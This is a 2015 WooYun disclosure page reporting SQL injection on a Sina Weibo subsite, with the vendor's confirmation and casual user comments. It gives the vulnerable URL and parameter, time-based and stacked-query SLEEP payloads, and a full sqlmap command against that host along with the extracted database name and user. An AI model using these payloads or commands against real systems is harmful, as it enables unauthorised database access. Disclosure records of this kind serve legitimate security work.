当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148330

漏洞标题:新浪微博某分站存在SQL注入漏洞

相关厂商:新浪微博

漏洞作者: 猪猪侠

提交时间:2015-10-21 14:05

修复时间:2015-12-08 10:16

公开时间:2015-12-08 10:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-21: 细节已通知厂商并且等待厂商处理中
2015-10-24: 厂商已经确认,细节仅向厂商公开
2015-11-03: 细节向核心白帽子及相关领域专家公开
2015-11-13: 细节向普通白帽子公开
2015-11-23: 细节向实习白帽子公开
2015-12-08: 细节向公众公开

简要描述:

新浪微博某分站存在SQL注入漏洞

详细说明:

#1 注入地址
http://daren.sc.weibo.com/h5/front/brand?type=3
#2 漏洞类型

GET parameter 'type' seems to be 'MySQL > 5.0.11 stacked queries' injectable 
GET parameter 'type' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable

漏洞证明:

Parameter: type (GET)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: type=3; SELECT SLEEP(5)-- 
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: type=3 AND SLEEP(5)


python sqlmap.py -u "http://daren.sc.weibo.com/h5/front/brand?type=3" --current-db --time-sec 1 --threads 5
database: darentong
current user: darentong@10.73.19.%

修复方案:

你们程序员更专业

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-10-24 10:15

厂商回复:

感谢关注新浪安全,安全问题修复中。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-10-21 14:07 | 随风的风 ( 普通白帽子 | Rank:170 漏洞数:56 | 微信公众号:233sec 不定期分享各种漏洞思...)

    沙发,猪猪侠,我爱你

  2. 2015-10-21 14:10 | zhiher ( 路人 | Rank:16 漏洞数:4 )

    猪猪侠,我爱你

  3. 2015-10-21 14:23 | prolog ( 普通白帽子 | Rank:580 漏洞数:111 | Rank:8888 漏洞数:1024 | 低调求发展)

    猪猪侠又发洞了,股市又不好了

  4. 2015-10-21 14:47 | 恶人毛 ( 实习白帽子 | Rank:38 漏洞数:4 | 深挖洞,广积粮。)

    围观

  5. 2015-10-21 15:26 | 举起手来 ( 核心白帽子 | Rank:893 漏洞数:93 | 准备好,举起手来!)

    神器?

  6. 2015-10-21 15:43 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3650 漏洞数:282 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @举起手来 是啊,把整个sqlmap的payload全加入?

  7. 2015-10-21 16:08 | 举起手来 ( 核心白帽子 | Rank:893 漏洞数:93 | 准备好,举起手来!)

    @猪猪侠 老板好眼力。

  8. 2015-10-21 16:42 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3650 漏洞数:282 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @举起手来 不错,毕竟机器多,哈哈

  9. 2015-10-21 16:49 | 王若伊 ( 路人 | Rank:8 漏洞数:4 | 妹子最喜欢关注此人!)

    @prolog 你这是黑猪猪侠

  10. 2015-10-21 16:55 | LoveSnow ( 路人 | Rank:13 漏洞数:4 | 以正和,以奇胜!)

    @举起手来@猪猪侠,我知道神器的原理了,哈哈

  11. 2015-10-21 17:23 | 小川 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:219 | 一个致力要将乌云变成搞笑论坛的男人)

    oh,no

  12. 2015-10-21 21:17 | Yuku ( 路人 | Rank:21 漏洞数:19 | 酱油哥)

    @猪猪侠 毕竟肉鸡多

  13. 2015-10-22 10:25 | 雷少 ( 实习白帽子 | Rank:73 漏洞数:31 | 热爱网络的爱好者,需求同道中人。)

    难怪今天微博开启防御最高

  14. 2015-10-29 10:02 | 染血の雪 ( 普通白帽子 | Rank:193 漏洞数:30 | 击缻)

    我擦居然重复了